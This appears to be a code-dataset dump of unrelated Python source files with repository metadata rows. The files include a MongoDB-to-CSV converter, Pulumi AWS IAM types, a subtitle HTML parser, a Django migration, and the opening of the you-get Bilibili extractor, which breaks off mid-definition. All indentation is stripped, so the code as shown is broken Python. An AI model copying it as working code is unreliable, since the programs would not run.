def displayVersion():
print('\n' + signature)
def displayInfo():
print(__doc__)
def cmongo2csv(file, out, separator, verbose, version, info):
if len(sys.argv) == 1:
displayInfo()
sys.exit(0)
if file == None and out == None:
if verbose == False and version == True and info == False:
displayVersion()
elif verbose == False and version == False and info == True:
displayInfo()
sys.exit(0)
if out == None: out = re.sub('.json', '.csv', file)
if file.endswith('.json') == False:
print('Input file is not a MongoDB dump.')
sys.exit(1)
if out.endswith('.csv') == False and out.endswith('.tsv') == False:
print('Output file is not a CSV or TSV file.')
sys.exit(1)
if separator == None: separator = ','
if out.endswith('.tsv'): separator = '\t'
f = open(file, 'r')
lines = f.readlines()
f.close()
fields = []
inserts = []
headers = True
for line in lines:
ii = ''
inputJson = json.loads(line)
for key, value in inputJson.iteritems():
fvalue = re.sub('\{|\}|\'', '', str(value))
pattern = re.compile('u\$oid')
if pattern.match(str(fvalue)):
if headers: fields.append(str(key))
v = re.split(':', str(fvalue), 1)
v = re.sub('\u', '', v[1], 1)
v = re.sub('\s', '', v, 1)
ii += 'ObjectId({0}){1}'.format(v, separator)
continue
pattern = re.compile('u\$date')
if pattern.match(str(fvalue)):
if headers: fields.append(str(key))
v = re.split(':', str(fvalue), 1)
v = re.sub('\u', '', v[1], 1)
v = re.sub('\s', '', v, 1)
v = ''.join(v)
ii += '{0}{1}'.format(v, separator)
continue
pattern = re.compile('[\w\s]+')
if pattern.match(str(fvalue)):
if headers: fields.append(str(key))
ii += '{0}{1}'.format(fvalue, separator)
ii = ii[:-1]
inserts.append(ii)
ii = ''
headers = False
if verbose:
print('\nGenerating CSV file: \'{0}\' from\nMongoDB JSON dump file: \'{1}\''
.format(out, file))
f = open(out, 'w')
f.write(separator.join(fields) + '\n')
for insert in inserts:
f.write(insert + '\n')
f.close()
# Handle any command line arguments.
parser = argparse.ArgumentParser(description='Utility to convert a MongoDB JSON dump to a CSV file.')
parser.add_argument('-f', '--file', action='store', dest='file', metavar="FILE")
parser.add_argument('-o', '--out', action='store', dest='out', metavar="OUT")
parser.add_argument('-s', '--separator', action='store', dest='separator', metavar="SEPARATOR")
parser.add_argument('-l', '--verbose', action='store_true', dest='verbose')
parser.add_argument('-v', '--version', action='store_true', dest='version')
parser.add_argument('-i', '--info', action='store_true', dest='info')
argv = parser.parse_args()
cmongo2csv(argv.file, argv.out, argv.separator, argv.verbose, argv.version, argv.info)
| 26.041667
| 101
| 0.6304
|
0f9ec0084e77fcdc23449679ce4618bdd7e314e8
| 924
|
py
|
Python
|
Maverick/Metadata.py
|
loftwah/Maverick
|
d0d3da922d0ee6fe2383301d16731890aef4e8ee
|
[
"MIT"
] | null | null | null |
Maverick/Metadata.py
|
loftwah/Maverick
|
d0d3da922d0ee6fe2383301d16731890aef4e8ee
|
[
"MIT"
] | null | null | null |
Maverick/Metadata.py
|
loftwah/Maverick
|
d0d3da922d0ee6fe2383301d16731890aef4e8ee
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import moment
class Metadata(dict):
"""Metadata
文章以及页面的元数据
"""
def __init__(self, fr):
dict.__init__({})
self["title"] = str(fr.get("title", ""))
self["slug"] = str(fr.get("slug", self["title"]))
self["date"] = moment.date(str(fr.get("date", ""))).locale('Asia/Shanghai')
self["layout"] = str(fr.get("layout", "post"))
self["status"] = str(fr.get("status", "publish"))
self["author"] = str(fr.get("author", ""))
self["banner"] = str(fr.get("banner", ""))
self["excerpt"] = str(fr.get("excerpt", ""))
self["path"] = ""
self["showfull"] = bool(fr.get("showfull", False))
self["comment"] = bool(fr.get("comment", True))
# 解析包含的 tag(无序)
self["tags"] = fr.get("tags", []) or []
# 解析包含的类别(有序)
self["categories"] = fr.get("categories", []) or []
| 28.875
| 83
| 0.506494
|
9b9a17fe44a5d339a116381449f5d3aa618c65d1
| 2,303
|
py
|
Python
|
burlap/manifest.py
|
tutordelphia/burlap
|
38e5cef10a480cd9931bee3e88d91cb58482bf41
|
[
"MIT"
] | null | null | null |
burlap/manifest.py
|
tutordelphia/burlap
|
38e5cef10a480cd9931bee3e88d91cb58482bf41
|
[
"MIT"
] | null | null | null |
burlap/manifest.py
|
tutordelphia/burlap
|
38e5cef10a480cd9931bee3e88d91cb58482bf41
|
[
"MIT"
] | null | null | null |
"""
Tracks changes between deployments.
"""
from __future__ import print_function
from pprint import pprint
#TODO: remove? largely deprecated, use the deploy module instead
from burlap import common
from burlap.decorators import task, runs_once
from burlap import Satchel
class ManifestSatchel(Satchel):
name = 'manifest'
@task
@runs_once
def show_current(self, name):
ret = self.get_current(name)
print('Current manifest for %s:' % name)
pprint(ret, indent=4)
@task
@runs_once
def show_last(self, name):
ret = self.get_last(name)
print('Last manifest for %s:' % name)
pprint(ret, indent=4)
@task
@runs_once
def get_current(self, name):
name = name.strip().lower()
func = common.manifest_recorder[name]
return func()
@task
@runs_once
def get_last(self, name):
from burlap.deploy import deploy as deploy_satchel
name = common.assert_valid_satchel(name)
last_thumbprint = deploy_satchel.get_previous_thumbprint()
#print('manifest.name:', name)
#print('manifest.last_thumbprint:')
#pprint(last_thumbprint, indent=4)
if last_thumbprint:
if name in last_thumbprint:
return last_thumbprint.get(name, type(self.genv)())
return type(self.genv)()
@task
@runs_once
def changed(self, name):
from burlap.deploy import deploy
name = name.strip().lower()
if name not in common.manifest_recorder:
print('No manifest recorder has been registered for component "%s"' % name)
else:
last_thumbprint = deploy.get_previous_thumbprint()
if last_thumbprint:
if name in last_thumbprint:
last_manifest = last_thumbprint[name]
current_manifest = common.manifest_recorder[name]()
if last_manifest == current_manifest:
print('No')
return False
print('Yes')
return True
print('Yes, first deployment for this component.')
return True
print('Yes, first deployment.')
return True
manifest = ManifestSatchel()
| 30.302632
| 87
| 0.603995
|
138669b132da9dea08d56de2d0715d72e59419e9
| 365
|
py
|
Python
|
apphv/mainUser/migrations/0025_auto_20190624_1503.py
|
FerneyMoreno20/Portfolio
|
59eaa4f4f6762386fe84450f65f508be1414f857
|
[
"bzip2-1.0.6"
] | null | null | null |
apphv/mainUser/migrations/0025_auto_20190624_1503.py
|
FerneyMoreno20/Portfolio
|
59eaa4f4f6762386fe84450f65f508be1414f857
|
[
"bzip2-1.0.6"
] | 6
|
2019-12-04T23:34:47.000Z
|
2021-06-09T18:01:16.000Z
|
apphv/mainUser/migrations/0025_auto_20190624_1503.py
|
FerneyMoreno20/Portfolio
|
59eaa4f4f6762386fe84450f65f508be1414f857
|
[
"bzip2-1.0.6"
] | null | null | null |
# Generated by Django 2.2.2 on 2019-06-24 15:03
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('mainUser', '0024_auto_20190624_1458'),
]
operations = [
migrations.RenameField(
model_name='usuarios',
old_name='IdUsuario',
new_name='id',
),
]
| 19.210526
| 48
| 0.586301
|
ed4b3e7585648338bb412b171701a067776a65ae
| 3,681
|
py
|
Python
|
Contents/Code/parser.py
|
balesz/SuperSubtitles.bundle
|
6df8346afea88c030c59ac7c22980575d835be4b
|
[
"Apache-2.0"
] | 9
|
2015-12-30T12:59:55.000Z
|
2022-01-09T19:57:37.000Z
|
Contents/Code/parser.py
|
balesz/SuperSubtitles.bundle
|
6df8346afea88c030c59ac7c22980575d835be4b
|
[
"Apache-2.0"
] | 1
|
2016-11-14T12:15:14.000Z
|
2016-11-14T12:15:14.000Z
|
Contents/Code/parser.py
|
balesz/SuperSubtitles.bundle
|
6df8346afea88c030c59ac7c22980575d835be4b
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
import re
from HTMLParser import HTMLParser
def clear_html(value):
start_pattern = "<!--Az eredménytáblázat ELEJE-->"
end_pattern = "<!--Az eredménytáblázat VÉGE-->"
if value.find(start_pattern) > 0 and value.find(end_pattern) > 0:
return value[value.find(start_pattern):value.find(end_pattern) + len(end_pattern)]
return value
class SubtitleInfo:
def __init__(self):
self.id = None
self.name = None
self.filename = None
self.is_movie = False
self.show_id = None
self.imdb_id = None
self.tvdb_id = None
# noinspection PyAugmentAssignment
class ResultParser(HTMLParser):
def __init__(self, raw):
HTMLParser.__init__(self)
self.level = 0
self.data = None
self.processing = False
self.need_reading_data = False
self.results = []
self.subtitle = None
self.feed(clear_html(raw))
def handle_starttag(self, tag, attrs):
if tag == "tr":
self.level = self.level + 1
for attr in attrs:
if attr == ("id", "vilagit"):
self.subtitle = SubtitleInfo()
self.level = 1
self.processing = True
if self.processing:
if tag == "a":
self.get_show_id(attrs[0][1])
self.get_subtitle_id(attrs[0][1])
self.get_subtitle_name(attrs[0][1])
if tag == "div" and attrs[0] == ("class", "eredeti"):
self.data = ""
self.need_reading_data = True
def handle_data(self, data):
if self.need_reading_data:
self.data = self.data + data
def handle_endtag(self, tag):
if tag == "div" and self.need_reading_data:
self.get_name(self.data)
self.data = None
self.need_reading_data = False
if tag == "tr":
if self.processing and self.level > 0:
self.level = self.level - 1
if self.processing and self.level == 0:
self.results.append(self.subtitle)
self.subtitle = None
self.processing = False
def error(self, message):
pass
def get_name(self, value):
self.subtitle.name = value
def get_show_id(self, value):
match = re.search(r'index\.php\?([fs]id)=(\d*)', value)
if match:
self.subtitle.is_movie = match.group(1) == 'fid'
self.subtitle.show_id = match.group(2)
def get_subtitle_id(self, value):
match = re.search(r'/index\.php\?action=letolt&fnev=.*&felirat=(\d*)', value)
if match:
self.subtitle.id = match.group(1)
def get_subtitle_name(self, value):
match = re.search(r'/index\.php\?action=letolt&fnev=(.*)&felirat=\d*', value)
if match:
self.subtitle.filename = match.group(1)
class DescriptionParser(HTMLParser):
metadata = SubtitleInfo()
def __init__(self, metadata, description):
HTMLParser.__init__(self)
self.metadata = metadata
self.feed(clear_html(description))
def handle_starttag(self, tag, attrs):
if tag == 'a' and len(attrs) == 3 and attrs[2] == ('alt', 'iMDB'):
match = re.search('^.*/(tt\d*)/?$', attrs[0][1])
if match:
self.metadata.imdb_id = match.group(1)
if tag == 'a' and len(attrs) == 3 and attrs[2] == ('alt', 'TheTVDB'):
match = re.search('^.*id=(\d*)$', attrs[0][1])
if match:
self.metadata.tvdb_id = match.group(1)
def error(self, message):
pass
| 32.008696
| 90
| 0.556642
|
80ead79911eac3d83aa6f65a4a17cfcf78003efc
| 14,694
|
py
|
Python
|
sdk/python/pulumi_aws/iam/outputs.py
|
wgarcia79/pulumi-aws
|
c63c224734f1d72ba84986a33f36413c9f9cbe27
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-11-10T16:33:40.000Z
|
2021-11-10T16:33:40.000Z
|
sdk/python/pulumi_aws/iam/outputs.py
|
wgarcia79/pulumi-aws
|
c63c224734f1d72ba84986a33f36413c9f9cbe27
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/iam/outputs.py
|
wgarcia79/pulumi-aws
|
c63c224734f1d72ba84986a33f36413c9f9cbe27
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._enums import *
__all__ = [
'RoleInlinePolicy',
'GetGroupUserResult',
'GetPolicyDocumentStatementResult',
'GetPolicyDocumentStatementConditionResult',
'GetPolicyDocumentStatementNotPrincipalResult',
'GetPolicyDocumentStatementPrincipalResult',
]
@pulumi.output_type
class RoleInlinePolicy(dict):
def __init__(__self__, *,
name: Optional[str] = None,
policy: Optional[str] = None):
"""
:param str name: Name of the role policy.
:param str policy: Policy document as a JSON formatted string.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if policy is not None:
pulumi.set(__self__, "policy", policy)
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the role policy.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def policy(self) -> Optional[str]:
"""
Policy document as a JSON formatted string.
"""
return pulumi.get(self, "policy")
@pulumi.output_type
class GetGroupUserResult(dict):
def __init__(__self__, *,
arn: str,
path: str,
user_id: str,
user_name: str):
"""
:param str arn: The Amazon Resource Name (ARN) specifying the iam user.
:param str path: The path to the iam user.
:param str user_id: The stable and unique string identifying the iam user.
:param str user_name: The name of the iam user.
"""
pulumi.set(__self__, "arn", arn)
pulumi.set(__self__, "path", path)
pulumi.set(__self__, "user_id", user_id)
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def arn(self) -> str:
"""
The Amazon Resource Name (ARN) specifying the iam user.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter
def path(self) -> str:
"""
The path to the iam user.
"""
return pulumi.get(self, "path")
@property
@pulumi.getter(name="userId")
def user_id(self) -> str:
"""
The stable and unique string identifying the iam user.
"""
return pulumi.get(self, "user_id")
@property
@pulumi.getter(name="userName")
def user_name(self) -> str:
"""
The name of the iam user.
"""
return pulumi.get(self, "user_name")
@pulumi.output_type
class GetPolicyDocumentStatementResult(dict):
def __init__(__self__, *,
actions: Optional[Sequence[str]] = None,
conditions: Optional[Sequence['outputs.GetPolicyDocumentStatementConditionResult']] = None,
effect: Optional[str] = None,
not_actions: Optional[Sequence[str]] = None,
not_principals: Optional[Sequence['outputs.GetPolicyDocumentStatementNotPrincipalResult']] = None,
not_resources: Optional[Sequence[str]] = None,
principals: Optional[Sequence['outputs.GetPolicyDocumentStatementPrincipalResult']] = None,
resources: Optional[Sequence[str]] = None,
sid: Optional[str] = None):
"""
:param Sequence[str] actions: List of actions that this statement either allows or denies. For example, `["ec2:RunInstances", "s3:*"]`.
:param Sequence['GetPolicyDocumentStatementConditionArgs'] conditions: Configuration block for a condition. Detailed below.
:param str effect: Whether this statement allows or denies the given actions. Valid values are `Allow` and `Deny`. Defaults to `Allow`.
:param Sequence[str] not_actions: List of actions that this statement does *not* apply to. Use to apply a policy statement to all actions *except* those listed.
:param Sequence['GetPolicyDocumentStatementNotPrincipalArgs'] not_principals: Like `principals` except these are principals that the statement does *not* apply to.
:param Sequence[str] not_resources: List of resource ARNs that this statement does *not* apply to. Use to apply a policy statement to all resources *except* those listed.
:param Sequence['GetPolicyDocumentStatementPrincipalArgs'] principals: Configuration block for principals. Detailed below.
:param Sequence[str] resources: List of resource ARNs that this statement applies to. This is required by AWS if used for an IAM policy.
:param str sid: Sid (statement ID) is an identifier for a policy statement.
"""
if actions is not None:
pulumi.set(__self__, "actions", actions)
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
if effect is not None:
pulumi.set(__self__, "effect", effect)
if not_actions is not None:
pulumi.set(__self__, "not_actions", not_actions)
if not_principals is not None:
pulumi.set(__self__, "not_principals", not_principals)
if not_resources is not None:
pulumi.set(__self__, "not_resources", not_resources)
if principals is not None:
pulumi.set(__self__, "principals", principals)
if resources is not None:
pulumi.set(__self__, "resources", resources)
if sid is not None:
pulumi.set(__self__, "sid", sid)
@property
@pulumi.getter
def actions(self) -> Optional[Sequence[str]]:
"""
List of actions that this statement either allows or denies. For example, `["ec2:RunInstances", "s3:*"]`.
"""
return pulumi.get(self, "actions")
@property
@pulumi.getter
def conditions(self) -> Optional[Sequence['outputs.GetPolicyDocumentStatementConditionResult']]:
"""
Configuration block for a condition. Detailed below.
"""
return pulumi.get(self, "conditions")
@property
@pulumi.getter
def effect(self) -> Optional[str]:
"""
Whether this statement allows or denies the given actions. Valid values are `Allow` and `Deny`. Defaults to `Allow`.
"""
return pulumi.get(self, "effect")
@property
@pulumi.getter(name="notActions")
def not_actions(self) -> Optional[Sequence[str]]:
"""
List of actions that this statement does *not* apply to. Use to apply a policy statement to all actions *except* those listed.
"""
return pulumi.get(self, "not_actions")
@property
@pulumi.getter(name="notPrincipals")
def not_principals(self) -> Optional[Sequence['outputs.GetPolicyDocumentStatementNotPrincipalResult']]:
"""
Like `principals` except these are principals that the statement does *not* apply to.
"""
return pulumi.get(self, "not_principals")
@property
@pulumi.getter(name="notResources")
def not_resources(self) -> Optional[Sequence[str]]:
"""
List of resource ARNs that this statement does *not* apply to. Use to apply a policy statement to all resources *except* those listed.
"""
return pulumi.get(self, "not_resources")
@property
@pulumi.getter
def principals(self) -> Optional[Sequence['outputs.GetPolicyDocumentStatementPrincipalResult']]:
"""
Configuration block for principals. Detailed below.
"""
return pulumi.get(self, "principals")
@property
@pulumi.getter
def resources(self) -> Optional[Sequence[str]]:
"""
List of resource ARNs that this statement applies to. This is required by AWS if used for an IAM policy.
"""
return pulumi.get(self, "resources")
@property
@pulumi.getter
def sid(self) -> Optional[str]:
"""
Sid (statement ID) is an identifier for a policy statement.
"""
return pulumi.get(self, "sid")
@pulumi.output_type
class GetPolicyDocumentStatementConditionResult(dict):
def __init__(__self__, *,
test: str,
values: Sequence[str],
variable: str):
"""
:param str test: Name of the [IAM condition operator](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_condition_operators.html) to evaluate.
:param Sequence[str] values: Values to evaluate the condition against. If multiple values are provided, the condition matches if at least one of them applies. That is, AWS evaluates multiple values as though using an "OR" boolean operation.
:param str variable: Name of a [Context Variable](http://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements.html#AvailableKeys) to apply the condition to. Context variables may either be standard AWS variables starting with `aws:` or service-specific variables prefixed with the service name.
"""
pulumi.set(__self__, "test", test)
pulumi.set(__self__, "values", values)
pulumi.set(__self__, "variable", variable)
@property
@pulumi.getter
def test(self) -> str:
"""
Name of the [IAM condition operator](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_condition_operators.html) to evaluate.
"""
return pulumi.get(self, "test")
@property
@pulumi.getter
def values(self) -> Sequence[str]:
"""
Values to evaluate the condition against. If multiple values are provided, the condition matches if at least one of them applies. That is, AWS evaluates multiple values as though using an "OR" boolean operation.
"""
return pulumi.get(self, "values")
@property
@pulumi.getter
def variable(self) -> str:
"""
Name of a [Context Variable](http://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements.html#AvailableKeys) to apply the condition to. Context variables may either be standard AWS variables starting with `aws:` or service-specific variables prefixed with the service name.
"""
return pulumi.get(self, "variable")
@pulumi.output_type
class GetPolicyDocumentStatementNotPrincipalResult(dict):
def __init__(__self__, *,
identifiers: Sequence[str],
type: str):
"""
:param Sequence[str] identifiers: List of identifiers for principals. When `type` is `AWS`, these are IAM principal ARNs, e.g., `arn:aws:iam::12345678901:role/yak-role`. When `type` is `Service`, these are AWS Service roles, e.g., `lambda.amazonaws.com`. When `type` is `Federated`, these are web identity users or SAML provider ARNs, e.g., `accounts.google.com` or `arn:aws:iam::12345678901:saml-provider/yak-saml-provider`. When `type` is `CanonicalUser`, these are [canonical user IDs](https://docs.aws.amazon.com/general/latest/gr/acct-identifiers.html#FindingCanonicalId), e.g., `79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be`.
:param str type: Type of principal. Valid values include `AWS`, `Service`, `Federated`, `CanonicalUser` and `*`.
"""
pulumi.set(__self__, "identifiers", identifiers)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def identifiers(self) -> Sequence[str]:
"""
List of identifiers for principals. When `type` is `AWS`, these are IAM principal ARNs, e.g., `arn:aws:iam::12345678901:role/yak-role`. When `type` is `Service`, these are AWS Service roles, e.g., `lambda.amazonaws.com`. When `type` is `Federated`, these are web identity users or SAML provider ARNs, e.g., `accounts.google.com` or `arn:aws:iam::12345678901:saml-provider/yak-saml-provider`. When `type` is `CanonicalUser`, these are [canonical user IDs](https://docs.aws.amazon.com/general/latest/gr/acct-identifiers.html#FindingCanonicalId), e.g., `79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be`.
"""
return pulumi.get(self, "identifiers")
@property
@pulumi.getter
def type(self) -> str:
"""
Type of principal. Valid values include `AWS`, `Service`, `Federated`, `CanonicalUser` and `*`.
"""
return pulumi.get(self, "type")
@pulumi.output_type
class GetPolicyDocumentStatementPrincipalResult(dict):
def __init__(__self__, *,
identifiers: Sequence[str],
type: str):
"""
:param Sequence[str] identifiers: List of identifiers for principals. When `type` is `AWS`, these are IAM principal ARNs, e.g., `arn:aws:iam::12345678901:role/yak-role`. When `type` is `Service`, these are AWS Service roles, e.g., `lambda.amazonaws.com`. When `type` is `Federated`, these are web identity users or SAML provider ARNs, e.g., `accounts.google.com` or `arn:aws:iam::12345678901:saml-provider/yak-saml-provider`. When `type` is `CanonicalUser`, these are [canonical user IDs](https://docs.aws.amazon.com/general/latest/gr/acct-identifiers.html#FindingCanonicalId), e.g., `79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be`.
:param str type: Type of principal. Valid values include `AWS`, `Service`, `Federated`, `CanonicalUser` and `*`.
"""
pulumi.set(__self__, "identifiers", identifiers)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def identifiers(self) -> Sequence[str]:
"""
List of identifiers for principals. When `type` is `AWS`, these are IAM principal ARNs, e.g., `arn:aws:iam::12345678901:role/yak-role`. When `type` is `Service`, these are AWS Service roles, e.g., `lambda.amazonaws.com`. When `type` is `Federated`, these are web identity users or SAML provider ARNs, e.g., `accounts.google.com` or `arn:aws:iam::12345678901:saml-provider/yak-saml-provider`. When `type` is `CanonicalUser`, these are [canonical user IDs](https://docs.aws.amazon.com/general/latest/gr/acct-identifiers.html#FindingCanonicalId), e.g., `79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be`.
"""
return pulumi.get(self, "identifiers")
@property
@pulumi.getter
def type(self) -> str:
"""
Type of principal. Valid values include `AWS`, `Service`, `Federated`, `CanonicalUser` and `*`.
"""
return pulumi.get(self, "type")
| 46.353312
| 660
| 0.658704
|
242494bfe92849b6fd51c6d6787900e6cbeb36c8
| 429
|
py
|
Python
|
examples/phend-fring.py
|
LBJ-Wade/phenom_gw_waveform
|
2c705e6ba85510c573d23dca8be4456665d29edf
|
[
"MIT"
] | 1
|
2020-05-12T00:55:53.000Z
|
2020-05-12T00:55:53.000Z
|
examples/phend-fring.py
|
LBJ-Wade/phenom_gw_waveform
|
2c705e6ba85510c573d23dca8be4456665d29edf
|
[
"MIT"
] | null | null | null |
examples/phend-fring.py
|
LBJ-Wade/phenom_gw_waveform
|
2c705e6ba85510c573d23dca8be4456665d29edf
|
[
"MIT"
] | 1
|
2021-04-10T22:31:49.000Z
|
2021-04-10T22:31:49.000Z
|
import phenom
eta, chi1z, chi2z = 0.25, 0., 0.
fin_spin = phenom.remnant.FinalSpin0815(eta, chi1z, chi2z)
fring = phenom.remnant.fring(eta, chi1z, chi2z, fin_spin)
fdamp = phenom.remnant.fdamp(eta, chi1z, chi2z, fin_spin)
print "ringdown frequency in geometric units = ", fring
print "imaginary part of the ringdown frequency = ", fdamp
Mtot = 100. #Msol
print "ringdown frequency in Hz = ", phenom.MftoHz(fring, Mtot)
| 21.45
| 63
| 0.724942
|
699085dae58f034ac76954056534702bf3e8b741
| 543
|
py
|
Python
|
manage.py
|
AlishaOne/onestop4you2
|
1d75ce3af56adfe884fd1953292dc070c7c4f23c
|
[
"MIT"
] | 1
|
2018-04-20T07:03:20.000Z
|
2018-04-20T07:03:20.000Z
|
manage.py
|
AlishaOne/onestop4you2
|
1d75ce3af56adfe884fd1953292dc070c7c4f23c
|
[
"MIT"
] | null | null | null |
manage.py
|
AlishaOne/onestop4you2
|
1d75ce3af56adfe884fd1953292dc070c7c4f23c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "onestop4you.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| 33.9375
| 75
| 0.688766
|
14cea8165c7c5ddfaf30384a9707b29b37016d05
| 483
|
py
|
Python
|
parrot/model/model_piv.py
|
wayne-batman/Parrot
|
d93c5132e3803917ccdd69dd3160253d1b6b3536
|
[
"Apache-2.0"
] | 14
|
2019-07-21T16:39:43.000Z
|
2021-06-21T09:13:28.000Z
|
parrot/model/model_piv.py
|
wayne-batman/Parrot
|
d93c5132e3803917ccdd69dd3160253d1b6b3536
|
[
"Apache-2.0"
] | null | null | null |
parrot/model/model_piv.py
|
wayne-batman/Parrot
|
d93c5132e3803917ccdd69dd3160253d1b6b3536
|
[
"Apache-2.0"
] | 1
|
2019-09-08T13:13:27.000Z
|
2019-09-08T13:13:27.000Z
|
import math
from parrot.core import *
class PIVModel(Model):
def __init__(self, s=0.25):
self.s = s
def score_term(self, tf: float, dtn: float, dl: float, ql: float, ctf: float,
df: float, qtf: float, ctn: float, C: float, N: float):
s = self.s
avdl = C / N
part3 = math.log((N + 1) / df)
part1 = (1 + math.log(1 + math.log(tf))) / ((1 - s) + s * dl / avdl)
score = part1 * qtf * part3
return score
| 30.1875
| 81
| 0.519669
|
7ea626f89da5922daed66095e0b6646226c8b315
| 40,554
|
py
|
Python
|
src/you_get/extractors/bilibili.py
|
TL-Yao/you-get
|
bf218bb27d81e27783680a6acb2d7ce8305cb880
|
[
"MIT"
] | null | null | null |
src/you_get/extractors/bilibili.py
|
TL-Yao/you-get
|
bf218bb27d81e27783680a6acb2d7ce8305cb880
|
[
"MIT"
] | null | null | null |
src/you_get/extractors/bilibili.py
|
TL-Yao/you-get
|
bf218bb27d81e27783680a6acb2d7ce8305cb880
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from ..common import *
from ..extractor import VideoExtractor
import hashlib
class Bilibili(VideoExtractor):
name = "Bilibili"
# Bilibili media encoding options, in descending quality order.
stream_types = [
{'id': 'hdflv2_4k', 'quality': 120, 'audio_quality': 30280,
'container': 'FLV', 'video_resolution': '2160p', 'desc': '超清 4K'},
{'id': 'flv_p60', 'quality': 116, 'audio_quality': 30280,
'container': 'FLV', 'video_resolution': '1080p', 'desc': '高清 1080P60'},
{'id': 'hdflv2', 'quality': 112, 'audio_quality': 30280,
'container': 'FLV', 'video_resolution': '1080p', 'desc': '高清 1080P+'},
{'id': 'flv', 'quality': 80, 'audio_quality': 30280,
'container': 'FLV', 'video_resolution': '1080p', 'desc': '高清 1080P'},
{'id': 'flv720_p60', 'quality': 74, 'audio_quality': 30280,
'container': 'FLV', 'video_resolution': '720p', 'desc': '高清 720P60'},
{'id': 'flv720', 'quality': 64, 'audio_quality': 30280,
'container': 'FLV', 'video_resolution': '720p', 'desc': '高清 720P'},
{'id': 'hdmp4', 'quality': 48, 'audio_quality': 30280,
'container': 'MP4', 'video_resolution': '720p', 'desc': '高清 720P (MP4)'},
{'id': 'flv480', 'quality': 32, 'audio_quality': 30280,
'container': 'FLV', 'video_resolution': '480p', 'desc': '清晰 480P'},
{'id': 'flv360', 'quality': 16, 'audio_quality': 30216,
'container': 'FLV', 'video_resolution': '360p', 'desc': '流畅 360P'},
# 'quality': 15?
{'id': 'mp4', 'quality': 0},
{'id': 'jpg', 'quality': 0},
]
@staticmethod
def height_to_quality(height, qn):
if height <= 360 and qn <= 16:
return 16
elif height <= 480 and qn <= 32:
return 32
elif height <= 720 and qn <= 64:
return 64
elif height <= 1080 and qn <= 80:
return 80
elif height <= 1080 and qn <= 112:
return 112
else:
return 120
@staticmethod
def bilibili_headers(referer=None, cookie=None):
# a reasonable UA
ua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'
headers = {'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.5', 'User-Agent': ua}
if referer is not None:
headers.update({'Referer': referer})
if cookie is not None:
headers.update({'Cookie': cookie})
return headers
@staticmethod
def bilibili_api(avid, cid, qn=0):
return 'https://api.bilibili.com/x/player/playurl?avid=%s&cid=%s&qn=%s&type=&otype=json&fnver=0&fnval=16&fourk=1' % (avid, cid, qn)
@staticmethod
def bilibili_audio_api(sid):
return 'https://www.bilibili.com/audio/music-service-c/web/url?sid=%s' % sid
@staticmethod
def bilibili_audio_info_api(sid):
return 'https://www.bilibili.com/audio/music-service-c/web/song/info?sid=%s' % sid
@staticmethod
def bilibili_audio_menu_info_api(sid):
return 'https://www.bilibili.com/audio/music-service-c/web/menu/info?sid=%s' % sid
@staticmethod
def bilibili_audio_menu_song_api(sid, ps=100):
return 'https://www.bilibili.com/audio/music-service-c/web/song/of-menu?sid=%s&pn=1&ps=%s' % (sid, ps)
@staticmethod
def bilibili_bangumi_api(avid, cid, ep_id, qn=0, fnval=16):
return 'https://api.bilibili.com/pgc/player/web/playurl?avid=%s&cid=%s&qn=%s&type=&otype=json&ep_id=%s&fnver=0&fnval=%s' % (avid, cid, qn, ep_id, fnval)
@staticmethod
def bilibili_interface_api(cid, qn=0):
entropy = 'rbMCKn@KuamXWlPMoJGsKcbiJKUfkPF_8dABscJntvqhRSETg'
appkey, sec = ''.join([chr(ord(i) + 2) for i in entropy[::-1]]).split(':')
params = 'appkey=%s&cid=%s&otype=json&qn=%s&quality=%s&type=' % (appkey, cid, qn, qn)
chksum = hashlib.md5(bytes(params + sec, 'utf8')).hexdigest()
return 'https://interface.bilibili.com/v2/playurl?%s&sign=%s' % (params, chksum)
@staticmethod
def bilibili_live_api(cid):
return 'https://api.live.bilibili.com/room/v1/Room/playUrl?cid=%s&quality=0&platform=web' % cid
@staticmethod
def bilibili_live_room_info_api(room_id):
return 'https://api.live.bilibili.com/room/v1/Room/get_info?room_id=%s' % room_id
@staticmethod
def bilibili_live_room_init_api(room_id):
return 'https://api.live.bilibili.com/room/v1/Room/room_init?id=%s' % room_id
@staticmethod
def bilibili_space_channel_api(mid, cid, pn=1, ps=100):
